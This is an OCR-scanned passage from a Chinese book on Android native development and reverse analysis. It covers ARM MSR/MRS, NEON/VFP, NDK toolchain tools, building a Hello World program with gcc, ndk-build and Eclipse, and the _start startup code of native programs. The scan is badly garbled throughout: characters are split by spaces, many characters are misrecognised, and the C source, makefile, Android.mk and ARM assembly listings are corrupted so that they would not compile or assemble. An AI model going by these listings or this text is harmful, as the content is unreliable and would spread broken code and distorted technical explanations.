psr 的 取 值 可 以 是 CPSR 或 SPSR。 

field 指 定 传 送 的 区 域 ， 它 的 取 值 如 表 6-5 所 示 〈field 所 代表 的 字母 必 
须 为 小 写 ) 。 


表 6-5 ”field 取 值 


控制 域 屏 蔽 学 节 (psr[7…0]) 


扩展 域 屏 蔽 字 节 (psr[15…8]) 
状态 域 屏蔽 字 节 (psr[23…16]) 
标志 域 屏蔽 字 节 (psr[31…24]) 





MSR 指 令 举 例如 下 : 

MRS RO, CPSR 8 读 取 CPSR 寄 存 器 到 R0 寄 存 器 中 
BIC R0，R0，#0x80 ”@ 清 除 R0 寄 存 器 第 7 位 

MSR CPSR_c, RO @ 开 启 IRQ 中 渐 


MOV PC, LR @ 子 程序 返回 





6.6 ”用 于 多 媒体 编程 与 浮 点 计算 的 NEON 与 VFP 
指令 集 


NEON 与 VFP 指 令 集 是 ARM 指 令 集 的 扩展 ， 多 用 于 多 媒体 编程 与 浮 
点 计算 。 从 Android 原 生 程序 开发 包 (Android NDK) r3 版 本 开始 ， 加 入 
了 对 NEON 与 VFP 指 令 集 的 支持 ， 如 果 想 使 用 NEON 指 令 集 ， 需 要 在 
Android.mk 文 件 中 加 入 一 行 LOCAL_ARM_NEON := true”，NEON 是 
ARMv7 才 支持 的 指令 集 ， 因 此 ， 还 需要 设置 TARGET_ARCH_ABI 的 值 
为 armeabi-v7a。 尽 管 如 此 还 不 够 ，NEON 与 VEFP 指 令 集 作为 处 理 器 的 “ 附 
加 ”指令 集 ， 在 很 多 手机 设备 的 处 理 器 中 可 能 不 支持 ， 为 了 解决 这 个 问 
题 ，Android ”NDK 提 供 了 一 个 “cpufeatures” 库 来 让 开发 者 在 运行 时 检测 
处 理 器 的 能 力 。 使 用 “cpufeatures” 库 的 方法 是 首先 在 Android.mk 文 件 中 
添加 “$(call import-module,android/cpufeatures)”， 然 后 在 C/C++ 代码 中 包 
舍 头 文件 *cpu-features.h”， 访 头 文件 中 定义 了 一 些 结构 体 与 枚 举 党 量 ， 
并 且 包 含 了 android_getCpuFamilyO、android_getCpuFeatures() 与 
android_getCpuCount 0 三 个 函数 。 

android_getCpuFamilyO 函 数 用 来 获取 处 理 器 的 家 族 信 息 。 对 于 
ARM 架 构 的 处 理 器 来 说 ， 它 始终 返回 一 个 常量 值 
ANDROID CPU FAMILY _ ARM。 

android_getCpuFeatures() 浮 数 用 来 检测 处 理 器 支持 的 指令 集 ， 如 果 
处 理 器 支持 NEON 指 令 集 ， 则 返回 的 64 位 数值 中 
ANDROID_CPU_ARM_FEATURE_NEON 标 志 就 会 被 置 位 ， 如 果 处 理 器 
支持 VFPv3 指 令 集 ， 则 ANDROID_CPU_ARM_FEATURE_VFPv3 就 会 被 
置 位 。 

android_getCpuCount () 函 数 用 来 获取 处 理 器 的 核心 数 。 

NEON 与 YFP 在 分 析 Android NDK 程 序 时 很 少见 ， 因 此 ， 本 书 不 讨 
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6.7 本 章 小 结 


本 章 主要 介绍 了 基于 Android 的 ARM 汇 编 语言 基础 知识 。ARM 处 理 
# 完 整 的 指令 集 系统 比较 庞大 ， 笔 者 不 可 能 也 没有 必要 对 它们 一 一 进行 
介绍 ， 再 三 其 酌 后 挑选 了 一 些 在 分 析 Android NDK 程 序 时 常见 到 的 汇编 
指令 进行 讲解 。 在 结束 本 章 的 学 习 后 ， 读 者 应 该 能 够 独立 的 阅读 一 般 的 
ARM 汇 编 代 码 。 下 一 章 ， 我 们 将 介绍 如 何 静 态 分 析 Android NDK 原 生 程 
J 
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现 如 今 ，Android 平 台 下 的 软件 应 用 复杂 多 变 ， 仅 使 用 Android SDK 
通过 Java 语 言 编 写 程序 已 经 不 能 满足 开发 者 了 ， 璧 如 : 音频 、 视 频 播放 
软件 解码 器 的 编写 束 涉 及 到 CPU 的 高 性 能 运算 ;， 其 它 平台 开发 的 游戏 如 
采用 C、C++ 编 写 的 ， 则 因为 涉及 到 移植 而 可 能 面临 重 写 所 有 代码 ; 传 
统 的 Java 语 言 编写 的 程序 容易 遭 到 逆 疝 人 破解， 需要 一 种 新 的 代码 保护 手 
段 来 防御 攻击 等 。 这 一 个 个 显 昔 的 需求 都 涌现 了 出 来 ， 为 了 解决 这 些 问 
题 ，Google 凭 借 Java 语 言 的 JNI 特 性 为 开发 者 提供 了 Android 
NDK (Native Development Kit) 。 

Android NDK 直 译 为 “安里 原生 开发 套件 ?。 它 是 一 蒜 强 大 的 工具 ， 
可 以 将 原生 C、C++ 代 码 的 强大 功能 和 Android 应 用 的 图 形 界 面 结 合 在 一 
起 ， 解 决 软件 的 跨 平台 问题 。 通 过 使 用 该 工具 ， 一 些 应 用 程序 能 直接 通 
过 JNI 调 用 与 CPU 打 交道 而 使 性 能 得 到 提升 。 同 时 ， 能 够 将 程序 的 核心 
功能 封装 进 基 于 “原生 开发 套件 ”的 模块 中 ， 从 而 大 大 提高 软件 的 安全 
性 。 




















7.1 Android 中 的 原生 程序 


Android “NDK 从 R8 版 本 开始 ， 文 持 生 成 X86、MIPS、ARM 三 种 染 
构 的 原生 程序 。 本 章 在 描述 时 ， 所 提 到 的 Android NDK 程 序 或 Android 原 
生 程 序 均 表 示 以 Android ”NDK  €R8 与 ARM 架 构 处 理 器 为 基础 ， 使 用 
C/C++ 代码 编写 的 可 执行 程序 或 动态 链接 库 。 


7.1.1 编写 一 个 例子 程序 


在 Android NDK  R8 开 发 套件 中 ， 为 开发 人 员 提 供 了 一 组 开 友 
Android NDK 原 生 程序 所 需 的 交叉 编译 工具 链 。 在 Windows 平 台 上 ， 如 
果 Android NDK 安 闭 在 D 盘 根 目 录 ， 那 么 工具 链 所 在 的 完整 路 径 
为 “D:\android-ndk-r8\toolchains\arm-linux-androideabi- 
4.4.3\prebuiltwindows\bin” 目 录 ， 这 些 工 具 的 前 级 都 为 “arm-linux- 
androideabi>， 代 表 它 们 适用 于 ARM 架 构 的 Android 程 序 开 发 ， 开 发 人 员 
可 以 直接 使 用 它们 来 编写 Android 平 台 上 的 原生 应 用 程序 。 所 有 工具 的 
使 用 方法 与 平时 在 Windows 或 Linux 平 台 下 使 用 的 gcc 并 没有 什么 区 别 ， 
命令 行 参数 也 基本 是 一 致 的 ， 只 是 应 用 平台 不 同 而 已 。 它 们 分 别 是 : 

arm-linux-androideabi-addr2line.exe: 将 程序 地 址 转换 为 文件 名 和 行 
号。 

arm-linux-androideabi-ar.exe: 建立 、 人 修改、 提取 归档 文件 。 


arm-linux-androideabi-as.exe: gas 汇 编 器 。 


























arm-linux-androideabi-c++.exe: 工具 链 中 arm-linux-androideabi- 
g++.exe 的 一 个 拷贝 。 

arm-linux-androideabi-c++filt.exe: 连接 占 使 用 它 过 滤 符 写 ， 防 止 重 
载 冰 数 冲突 。 





arm-linux-androideabi-cpp.exe: C++ 程序 编译 工具 。 
arm-linux-androideabi-g++.exe: C++ 程序 编译 工具 。 





arm-linux-androideabi-gcc-4.4.3.exe: 工具 链 中 arm-linux-androideabi- 
gcc.exe 的 一 个 拷贝 。arm-linux-androideabi-gcc.exe: C 程 序 编译 工具 。 

arm-linux-androideabi-gcov.exe: 程序 履 盖 度 测量 工具 ， 记 录 代 码 的 
执行 路 径 。 

arm-linux-androideabi-gdb.exe: 调试 工具 。 

arm-linux-androideabi-gprof.exe: 程序 性 能 测量 工具 。 

arm-linux-androideabi-ld.exe: 链接 器 ， 用 于 生成 可 执行 程序 。 

arm-linux-androideabi-nm.exe: 列 出 目标 文件 中 的 符号 。 

arm-linux-androideabi-objcopy.exe: 复制 目标 文件 中 的 内 容 到 另 一 种 
类 型 的 目标 文件 中 。arm-linux-androideabi-objdump.exe: 输出 目标 文件 
的 信息 。 

arm-linux-androideabi-ranlib.exe: 产生 归档 文件 索引 ， 并 将 其 保存 
到 这 个 归档 文件 中 。arm-linux-androideabi-readelf.exe: 显示 elf 格 式 可 执 
行文 件 的 信息 。 

arm-linux-androideabi-run.exe: ARM 程 序 模拟 器 。 

arm-linux-androideabi-size.exe: 列 出 目标 文件 每 一 段 的 大 小 以 及 总 
体 的 大 小 。 

arm-linux-androideabi-strings.exe: 输出 目标 文件 的 可 打印 字符 串 。 

arm-linux-androideabi-strip.exe: 去 除 目标 文件 中 的 符号 信息 。 

了 解 了 这 些 工 具 之 后 ， 我 们 来 编写 一 个 C 语 言 的 Hello World 程 序 ， 
代码 如 下 : 














#include <stdio.h> 

nt ALn(1nt arge, 1nt** argv[l]}t 
Dintf("Hello BRMIMA"): 
0 


} 


7.1.2 ”如 何 编 译 原 生 程 序 





编译 生成 原生 程序 有 以 下 三 种 方法 : 

e 使 用 gcc 编 译 器 手动 编译 

e 使 用 ndk-build 工 具 手 动 编译 

e 使 用 Eclipse 创建 工程 并 自动 编译 
下 面 我 来 对 这 三 种 方法 分 别 进行 讲解 。 





7.1.2.1 ”使 用 gcc 编 译 器 手动 编译 








使 用 gcc 编 译 原生 程序 需要 先 编写 makefile 文 件 ， 然 后 通过 gcc make 
工具 进行 编译 。 在 Windows 平 台 下 编写 makefile 文 件 内 容 如 下 : 


NDK_ROOT=D: /android-ndk-r8 

TOOLCHAINS_ROOT=$ (NDK_ROOT) /toolchains/arm-linux-androideabi-4.4.3/prebui 
lt/windows 
TOOLCHAINS_PREFIX=$ (TOOLCHAINS_ ROOT) /bin/arm-linux-androideabi 
TOOLCHAINS_INCLUDE=$ (TOOLCHAINS_ROOT) /lib/gcc/arm-linux-androideabi/4.4.3/ 
include-fixed 

PLATFORM_ ROOT=$ (NDK_ROOT) /platforms/android-14/arch-arm 
PLATFORM_INCLUDE=$ (PLATFORM ROOT) /usr/include 

PLATFORM LIB=$ (PLATFORM ROOT) /usr/lib 

MODULE_ NAME=hello 

RM=del 


FLAGS=-IS (TOOLCHAINS_INCLUDE) \ 

-IS$ (PLATFORM_INCLUDE) \ 

-LS (PLATFORM_LIB) N\\ 

-nostdlib \ 

-lgcc \\ 

-Bdynamic \ 

-lc 
OBJS=$ (MODULE_NAME) .0o \ 

$ (PLATFORM_ LIB)/crtbegin dynamic.o \ 

$ (PLATFORM_ LIB) /crtend_android.o 
有 

$ (TOOLCHAINS_PREFIX) -gcc $ (FLAGS) -c $ {MODULE_ NAME) .C -Oo 
$ (MODULE_NAME) .o 

$ (TOOLCHAINS_PREFIX) -gcc $ {FLAGS) $ (OBJS) -o $ (MODULE_ NAME) 
clean: 

$ (RM) *,0O 
install; 

adb push $ (MODULE NAME) /data/local/ 

adb shell chmod 755 /data/local/$s (MODULE_NAME) 


原生 程序 的 生成 过 程 分 成 两 个 步 又: 第 一 步 将 hello.c 文 件 编译 成 
hello.o 目 标 文件 ， 第 二 步 将 hello.o 目 标 文件 与 特定 的 原生 程序 启动 代码 
及 依赖 库 进 行 链接 最 终生 成 可 执行 文件 。 在 makefile 文 件 中 ，FLAGS 变 
量 为 gcc 编 译 器 的 命令 行 参 数 增加 了 头 文件 与 库 文件 的 搜索 路 径 及 编译 
选项 ，all 标 签 指定 了 编译 程序 时 所 需要 执行 的 命令 ，clean 标 签 用 于 清理 
生成 的 目标 文件 ，install 标 签 将 生成 的 可 执行 文件 安装 到 模拟 器 或 手机 
中 去 。 这 里 需要 说 明 的 是 ，Android 并 没有 采用 glibc 作 为 C 库 ， 而 是 采用 





了 Google 上 自己 开发 的 Bionic C 库 。 因 此 ， 编 译 选 项 中 需要 加 入 “- 
nostdlib”。 

交叉 工具 链 中 提供 的 make.exe 工 具 位 于 “D:vandroid-ndk- 
r8\prebuiltwindows\bin” 目 录 ， 在 编译 前 需要 将 这 个 路 径 加 入 到 系统 或 临 
时 的 PATH 环境 变量 中 ， 然 后 将 hello.c 与 makefile 文 件 放 到 一 个 目录 ， 开 
启 Android 模 拟 器 或 将 开发 用 的 手机 连接 电脑 ， 完 成 这 些 工作 后 进入 命 
令 行 环 境 依 次 执行 以 下 命令 : 


make 











make install 

adb shell /data/local/hello 

可 以 看 到 执行 效果 输出 了 “Hello ARM!”。 在 Windows 平 台 编 译 原生 
程序 就 完成 了 。Ubuntu 下 编译 程序 还 需要 修改 上 面 的 makefile 文 件 ， 调 
整 Android NDK 目 录 的 路 径 ， 最 终 修 改 完成 的 文件 名 为 
makefile ubuntu， 在 终端 提示 符 下 输入 “make -f makefile ubuntu” 会 与 
Windows 平 台 上 和 输出 同样 的 结果 。 
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尽管 使 用 交叉 工具 链 可 以 手动 编译 生成 原生 程序 ， 不 过 Android 官 方 的 建议 是 尽量 使 用 ndk- 
build 来 完成 这 项 工作 ， 尤 其 是 在 移植 其 它 平 台 应 用 程序 的 时 候 ， 会 避免 很 多 不 必要 的 麻烦 。 






































7.1.2.2 ”使 用 ndk-build 编 译 


使 用 gcc 编 译 生 成 原生 程序 的 方法 比较 “原始 "，Android NDK 开 发 套 
件 提 供 了 一 个 ndk-build 工 具 ， 方 便 开发 者 来 快速 地 生成 原生 程序 。 在 使 
用 ndk-build 工 具 前 ， 需 要 先 有 一 个 Android 工 程 ， 这 个 工程 可 以 从 
Android NDK 的 samples 目 录 中 随便 复制 一 份 ， 也 可 以 使 用 Android SDK 
开发 包 tools 目 录 下 的 android 脚 本 来 生成 。 下 面 我 们 使 用 android 脚 本 来 生 





成 一 个 Android 工 程 。 

android 脚 本 可 以 用 来 管理 AVD、Android 工 程 ， 完 整 的 命令 行 可 以 
输入 “android --help” 查 看 ， 这 里 需要 使 用 到 它 的 “create project" 选 项 ， 首 
先 在 命令 行 下 输入 “android list”， 这 个 命令 会 列 出 Android SDK 中 所 ee 
经 安装 的 SDK 平 台 的 版 本 ， 在 第 1 章 中 我 们 已 经 完成 了 Android SDK 的 安 
装 ， 这 里 成 功 执行 的 话 会 输出 下 面 类 似 的 结 


ia: 7 Gr "android=10" 
Name: Android 2.3.3 
Type: Platform 
API level: 10 
Revision: 2 
Skins: HVGA, QVGA, WQVGA400, WOVGA432, WVGA800 (default), WVGA854 


ABIs : armeabi 


使 用 “android list* 列 出 所 有 SDK 平 台 版 本 后 ， 选 择 其 中 一 个 作为 项 
目的 平台 版 本 号 ， 这 里 选择 android-10 表 示 生 成 Android 2.3.3 的 工程 。 接 
下 来 创建 Android 工 程 ， 输 入 以 下 命令 : 


android create project -n hello2 -p hello2 -t android-10 -k com.droider.hello2 
-a MyActiviry 


命令 行 的 解释 如 下 :“-n” 指 定 Android 工 程 的 名 称 , “-t" 指 定 生成 
Android 工 程 押 需要 使 用 的 平台 版 本 号 ， 也 就 是 android list 列 出 的 版 本 号 
之 一 ，“-p” 指 定 生 成 工程 的 目录 名 ,“-k” 指 定 Android 工 程 的 包 名 ，“- 
a” 指 定 默 认 Activity 的 名 称 ，“android create project” 会 根据 默认 Activity 文 
件 名 目 动 生成 相应 的 java 文 件 ， 并 生成 AndroidMenifest.xml。 执 行 完 以 
上 人 命令， 最终 的 效果 如 下 所 示 。 


android create project -n hello2 -p hello2 -t android-10 -k com.droider.hello2 
-a MyActiviry 

lip\httpmime-4.1.1.jar 

已 复制 EAs 

Created project directory: D:\workspace\chapter7\7.1\7.1.2\hello2 

Created directory D:\workspace\chapter7\7.1\7.1.2\hello2\src\com\droider\ 
hello2 

Added file D:\workspace\chapter7\7.1\7.1.2\hello2\src\com\droider\hello2\ 
MyActiviry.java 

Created directory D:\workspace\chapter7\7.1\7.1.2\hello2\res 

Created directory D:\workspace\chapter7\7.1\7.1.2\hello2\bin 

Added file D:\workspace\chapter7\7.1\7.1.2\hello2\build.xml 

Added file D:\workspace\chapter7\7.1\7.1.2\hello2\proguard-project.txt 


Android 工 程 生 成 好 了 。 下 一 步 在 工程 的 根 目录 下 新 建 一 个 jni 文 件 
来， 并 将 hello.c 文 件 复制 进去 。 接 着 编写 ndk-build 所 需要 的 脚本 文件 ， 
ndk-build 使 用 Android.mk 与 Application.mk 作 为 它 的 脚本 文件 ， 其 中 
Application.mk 文 件 是 可 选 的 ， 用 来 描述 原生 程序 本 续 使 用 到 的 一 些 特 
性 ， 如 原生 程序 文 持 的 ARM 硬 件 指令 集 、 工 程 编 译 脚 本 、STL 文 持 等 ， 
我 们 在 后 面 的 章节 中 会 用 到 它 ，Android.mk 文 件 是 工程 的 编译 脚本 ， 描 
述 了 编译 原生 程序 所 需 的 编译 选项 、 头 文件 、 源 文件 及 依赖 库 等 。 本 例 
不 需要 使 用 Application.mk， 编 号 Android.mk 文 件 内 容 如 下 : 








LOCRATL_PATH := $(call my-dir) 
include $ (CLEAR_VARS) 
LOCAL_ARM_ MODE := arm 

LOCAL_ MODULE := hello 
LOCAL_SRC_FILES := hello.c 


include $ (BUILD_ EXECUTABLE) 

一 个 Android.mk 文 件 由 若干 条 定义 语句 组 成 。 下 面 看 看 它们 每 一 行 
的 具体 作用 : 

LOCAL_PATH := S$(call my-dir) 

LOCAL PATH 定义 了 本 地 源码 的 路 径 ， 它 是 Android.mk 文 件 中 必 


须 首 先 定 义 好 的 变量 ，call my-dir 指 定 了 调用 my-dir 安 ， 它 是 由 编译 系统 





提供 的 ， 返 回 Android.mk 文 件 本 身 所 在 的 路 径 。 一 般 与 源码 文件 目录 相 
同 。 

include $ (CLEAR VARS) 

CLEAR_VARS 指 定 让 编译 系统 清除 挥 一 些 已 经 定义 过 的 宏 ， 这 些 
宏 的 定义 都 是 全 局 的 。 如 LOCAL MODULE、LOCAL SRC FILE， 当 
一 个 GUN MAKE 在 编译 多 个 模块 时 ， 必 须 清 除 并 重新 设置 它们 。 

LOCAL ARM MODE := arm 

LOCAL_ARM_MODE 指 定 生成 的 原生 程序 所 使 用 的 ARM 指 令 模 


式 。arm 表 示 使 用 32 位 的 arm 指 令 系 统 。 


LOCAL MODULE := hello 
LOCAL_MODULE 指 定 模块 的 名 称 ， 即 原生 程序 生成 后 的 文件 名 。 
这 里 最 终 将 生成 名 为 hello 的 文件 ， 如 果 生 成 共享 库 模 块 ， 将 会 生成 











libhello.so。 

LOCAL SRC FILES := hello.c 

LOCAL SRC_FILES 指 定 C 或 C++ 源 文 件 列表 。 这 里 只 有 一 个 hello.c 
文件 。 


include SS(BUILD_RXECUTRABTDE ) 

指定 生成 的 文件 类 型 。BUILD_EXECUTABLE 表 示 生 成 可 执行 文 
件 ，BUILD_SHARED_LIBRARY 表 示 生 成 动态 库 ， 
BUILD_STATIC_LIBRARY 表 示 生 成 静态 库 。 

Android.mk 文 件 编写 完毕 后 ， 将 它 与 hello.c 文 件 放 到 jni 同 一 目录 
下 ， 然 后 在 命令 行 下 进入 hello2 工 程 目 录 ， 输 入 ndk-build 命 令 就 会 在 
libs/armeabi 目 录 下 生成 hello 可 执行 文件 ， 执 行 效 果 如 下 所 示 。 


ndk-build 

Pass 

android-l0false 
D:/android-ndk-r8/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows 
/bin/../lib/gcc/arm-linux-androideabi/4.4.3/libgcc.a 
D:/android-ndk-r8/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows 


/bin/../lib/gcc/arm-linux-androideabi/4.4.3/libgcc.a 





"Compile arm : hello <= hello.c 

Executable : hello 

Install : hello => libs/armeabi/hello 
已 复制 LE im 


将 hello 复 制 到 模拟 器 或 手机 中 ， 执 行 效果 与 使 用 gcc 编 译 器 手动 编 
半 是 一 样 的 。 


7.1.2.3 ”使 用 Eclipse 创建 工程 并 自动 编译 


使 用 Eclipse 上 自动 编译 原生 程序 的 原理 依旧 是 使 用 ndk-build 工 具 ， 但 
目 动 化 的 操作 会 使 得 开发 原生 程序 更 加 高 效 。 打 开 Eclipse， 新 建 一 个 
Android 工 程 ， 取 名 为 hello3， 其 它 选项 保持 默认 ， 不 停 点 击 下 一 步 完 成 
创建 。 在 工程 中 新 建 jni 目 录 ， 然 后 将 hello.c 与 Android.mk 文 件 寻 入 ， 也 
可 以 直接 将 hello2 工 程 的 jni 目 录 拷 贝 到 hello3 工 程 目录 ， 然 后 在 Eclipse 中 
的 hello3 工 程 上 按 F5 刷 新 工程 。 

下 面 新 建 一 个 Build， 当 我 们 在 编写 代码 时 保存 修改 后 ，Eclipse 会 自 
动 为 我 们 编译 生成 原生 程序 。 在 hello3 工 程 上 右键 选择 Properties， 点 击 
Builders 选 项 ， 再 点 击 Builders 选 项 页 右 侧 的 New 按 钮 ， 然 后 双击 Program 
项 打开 Edit Configuration 对 话 框 ， 在 对 话 框 的 Name 一 栏 设置 Builder 的 名 
称 ， 这 里 输入 “JNI Builder”， 在 Location 一 栏 输入 “${fenv_var: 
ANDROID_NDK}/ndk-build.cmd” 设 置 要 执行 的 命令 ， 点 击 Working 
Drrectory 右 侧 的 Browse Workspace 按 钮 选择 hello3 工 程 ， 最 后 点 击 Apply 
按钮 应 用 更 改 ， 操 作 完 后 效果 如 图 7-1 所 示 。 





EEdit Configuration 


Edit launch configuration properties 
Create a confieuration that will run a program duaring builds 


Hame: JINI_Builder 
辕 | Main un Refresh 攀 Environment lz3 Build Dptions 
Location: 
$ {enw_var: ANDROID_ NDK}/ndk-build. emd 


PT Po Fr 


Workine Directory: 


中 fworkspace_loc:yhel1o3} 


FT COST EEC 





ET 


Note: Enclose an argument containing spaces using donble-quotes ("). 





图 7-1 配置 JNL Builder 选 项 


单 击 Refresh 标 签 ， 勾 选 “Refresh resources upon completion” 复 选 框 。 

单 击 Build ”Options 标 签 ， 勾 选 “During ”auto ”builds” 复 选 杠 ， 义 
选 “Specify working set of relevant resources” 复 选 框 ， 点 击 “Specify 
Resources” 按 钮 ， 勺 选 hello3 工 程 的 jni 目 录 ， 点 击 Finish 按 钮 ， 点 击 OK 按 
钮 关闭 Edit Configuration 对 话 框 。 

点 击 OK 按 钮 关闭 Properties 对 话 框 。 这 时 hello3 工 程 就 会 自动 编译 ， 
最 后 在 libs/armeabi 目 录 下 生成 hello 可 执行 文件 ， 效 果 如 图 7-2 所 示 。 并 
且 以 后 在 Eclipse 中 对 jni 目 录 下 的 任何 文件 进行 修改 保存 操作 ， 都 会 触发 
JNL_ Builder 执 行 来 重新 编译 工程 。 





EE Java — hello37jni7aAndroid- ak 一 Eclipse 
File Edit Refactor Navigate Search Eroject Kun Window Help 


UO QO 富 ) 它 PAY 






































上 屿 Package Explorer 32 |® Mndroid. mk BO 
# Licensed under the Apache License, Version 2.0 (che "License"); 
you may not use this file except in compliance with the License， 


日 六 hello3 
You may obtain a copy of the License at 


由 - 英 sre 
由 -名 gen [Generated Java Files 
BN Android 2.3.3 
Ht] BN Android Dependencies 
色 assets 
9) 名 bin 
Er jni 
| 外 hmdroid mk 
国 hello.e 
册 libs 
由 GG armeabi 





http://wuw.apache.org/licenses/LICENSE-2.0 


Unless redquired by applicable law or agreed to in writing, software 
distributed under the License is distributed on an "AS IS" BASIS, 
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and 
limitations under the License， 


:3 


LOCAL PATH := $ {call my-dir 
$ (CLEAR VARS) 


LOCAL ARM HODE := arm 

LOCAL MODULE := hello 

LOCAL SRC FILES := hello.c 
$ (BUILD EXECUTABLE) 


do AndroidWanifest. xml 
AndroidManifest. xml 
Proguard-project, txt 





project. properties 


El Problens @ Javadoc [&, Declaration 国 Console 3 忆 其 滨 Ex 局: 有 辐 国 ]| wa 
<terminated> JHI_Builder [Program] C:\android-ndk-rB\ndk-build. cmd 
"Compile arm : hello <= hello.c 


Executable : helld| 


Install : hello => libs/armeabi/hello 


[4 篇 hello3 EE Java - hello3/ ijn yO 18:16 





图 7-2 ”使 用 Eclipse 自动 编译 生成 原生 程序 





7.2 原生 程序 的 局 动 流程 分 析 


很 多 人 认为 main 函 数 是 程序 的 入 口 函 数 ， 其 实 不 然 ， 在 程序 局 动 过 
程 中 ，main 函 数 开始 前 ， 需 要 做 一 些 初 始 化 的 工作 ， 如 动态 库 的 加 载 、 
程序 的 参数 argc 和 argv 的 初始 化 等 。 


7.2.1 原生 程序 的 入 口 函数 


原生 程序 有 静态 链接 与 动态 链接 两 种 ， 其 中 动态 链接 又 分 为 动态 链 
接 程 序 与 动态 链接 库 。 

静态 链接 需要 在 gcc 编 译 器 的 命令 行 参数 中 指定 -Bstatic， 在 生成 可 
执行 程序 时 会 链接 crtbegin_static.o 与 crtend_android.o 目 标 文 件 ， 
crtbegin_static.o 文 件 中 定义 了 静态 链接 程序 的 启动 函数 _start， 这 个 函数 
是 程序 启动 时 执行 的 第 一 个 函数 。 静 态 链接 的 程序 在 启动 时 不 需要 额外 
的 加 载 其 它 的 动态 库 ， 这 类 程序 相对 较 少 ， 已 知 的 有 Android 系 统 中 的 
init、adbd、1linker 等 程序 。 

动态 链接 需要 在 gcc 编 译 器 的 命令 行 参 数 中 指定 -Bdynamic， 在 生成 
可 执行 程序 时 会 链接 crtbegin_dynamic.o 与 crtend_android.o 目 标 文件 ， 并 
且 动 态 链接 时 需要 通过 “--dynamic-linker” 参 数 指定 程序 的 “加 载 器 >”， 默 
认为 “system/binrlinker”。 在 生成 的 可 执行 程序 中 ， 每 个 程序 都 会 包含 一 
个 “.interp” 段 来 存 入 程序 的 “加 载 器 ”。 动 态 链接 程序 的 司 动 函 数 _start 位 
于 crtbegin_dynamic.o 文 件 中 ， 目 前 该 文件 的 实现 与 静态 链接 的 
crtbegin_static.0o 文 件 完全 相同 ， 也 就 是 次， 静态 链接 与 动态 链接 有 者 相 
同 的 局 动 函数 。 

其 实 无 论 是 动态 链接 还 是 静态 链接 Android 原 生 程序 ， 在 链接 时 都 
会 传 入 一 个 链接 脚本 ， 根 据 链接 时 指定 参数 的 不 同 ， 所 传 入 的 链接 脚本 









































也 不 一 样 ， 所 有 的 链接 脚本 位 于 Android NDK 的 toolchains\arm-linux- 
androideabi-4.4.3\prebuilt\windows\arm-linux-androideabi\lib\ldscripts 目 隶 
中 ， 默 认 情 况 下 ， 链 接 时 会 传 入 armelf linux_eabi.x 脚 本 文件 ， 该 文件 的 
第 五 行 代码 “ENTRY(_star0” 指 出 程序 入 口 函数 为 _start， 也 就 是 上 面 
crtbegin_dynamic.o 与 crtbegin_static.0 文 件 中 的 _start 函 数 ， 它 们 的 源码 分 
别 位 于 Android 4.0 源 人 码 bionic\libc\arch-arm\bionic 目 录 下 的 
crtbegin_dynamic.S 与 crtbegin_static.S 文 件 中 (Android 4.1 源 码 中 己 经 去 
除 ) 。 打 开 crtbegin_static.S 或 crtbegin_dynamic.S 文 件 ， 代 人 码 如 下 : 


OO OOOD Pr 


text 

.align 4 

.type _start,#function 
lionli Itart 


a 
mov r0, sp 
mov rl1l, #0 
AQ “py YE 
和 
b Tiber mi 
0: b main 
Ls: long: ‘PRETNTT ARRAY 
.long __INIT ARRAY _ 
.long __FINI_ARRAY __ 
ong CTOR ELSTD 


.Section .preinit_ array, 
.globl __PREINIT ARRAY _ 


__PREINIT ARRAY : 
.long -1 


.Section .init_array, 

.globl __INIT_ARRAY__ 
INIT ARRAY__: 

.long -1 


.Section .fini_array, 

.glob]l] __FINI ARRAY _ 
FENT ARRAY. 3» 

.long -1 

“Section .CtoOrs, “aw 

LGBE QTOR BEST 
cc CTOR BLST 

.long -1 


#include "__dso_handle.s" 


#include "atexit.Ss" 


aw" 


有 aw" 


@ 声 明代 码 段 

@ 对 齐 方 式 为 2^4=16 字 节 
@_start 为 函数 

@ 声 明 _start 标 识 符 


@ 取 堆栈 指针 

er1 = 0 

e@ 标 号 0 地 址 ， 即 执行 main 函 数 的 指针 
@ 标 号 1 地 址 ， 即 数组 指针 

@ 执 行 __ libc_init 

@ 执 行 main 


@4 个 标号 地 址 


@ 声 明 preinit_array 


"aw" 


@ 声 明 init_array 


@ 声 明 fini_array 


@ 声 明 ctors 


1-4 行 声明 了 _start 函 数 以 及 代码 对 齐 方式 。 

5-14 行 调用 了 __jlibc_init 函 数 ， 传 递 了 4 个 参数 。 分 别 是 堆栈 指针 、 
数值 0、 执 行 main 函 数 的 指针 与 4 个 段 数 组 的 指针 。 

15-18 行 保存 了 4 个 数组 段 地 址 。 

19-39 行 声明 了 4 个 数组 段 ， 每 个 数据 段 声明 了 一 个 全 局 标 符 符 ， 并 
都 只 有 一 个 long 类 型 值 为 -1。 

40-41 行 包含 了 其 它 两 个 汇编 文件 ， 有 具体 就 不 再 跟 入 了 。 

对 于 静态 链接 的 程序 来 说 ， 上 面 这 段 代码 的 确 就 是 它 的 启动 函数 
了 ， 但 动态 链接 的 程序 却 没 有 这 么 简单 ， 动 态 链 接 的 程序 在 运行 前 还 需 
要 做 一 些 初 始 化 工作 ， 如 程序 运行 所 依赖 的 动态 库 需 要 先 被 载 入 内 存 。 
这 项 工作 是 由 前 面 介 绍 的 程序 “加 载 器 "来 完成 的 。 当 通过 execve 执 行 一 
个 动态 链接 的 程序 时 ，Android 系 统 内 核 会 解析 这 个 ELF 文 件 ， 先 找到 程 
序 的 解释 器 ， 一 般 是 /system/bin/linker， 然 后 执行 linker， 最 后 由 linker 调 
用 真正 的 可 执行 程序 的 代码 。 

前 面 曾 说 过 ， 静 态 链接 的 程序 的 启动 代码 位 于 crtbegin_static.o 目 标 
文件 中 ，linker 虽 然 是 静态 链接 程序 ， 但 它 的 启动 函数 并 不 在 它 里 面 ， 
在 Android 源 码 的 bioniclinkerAndroid.mk 文 件 中 ，linker 指 定 了 目 己 的 局 
动 困 数 所 在 的 文件 begin.S， 访 文件 代码 如 下 : 























:text 

.align 4 

.type _start,#function @ 声 明 _start 邱 数 
:Glo “Start 


-art 

moV r0, sp @r0 指 向 堆栈 指针 

IIOV 区 

bl _ linker init @ 调 用 _1inker_init 函 数 


* linker init returns the _entry address in the main image */ 
mov pec, r0 @ 执 行 _1inker_init 返 回 的 代码 , 即 程序 入 口 


.Section .ctors, "wa" 

Lobl CPOR _LIST 
_CTOR LIST : 

Re .long -1 


linker 调 用 linker_init 函 数 来 进行 初始 化 工作 ， 初 始 化 完毕 后 会 返 
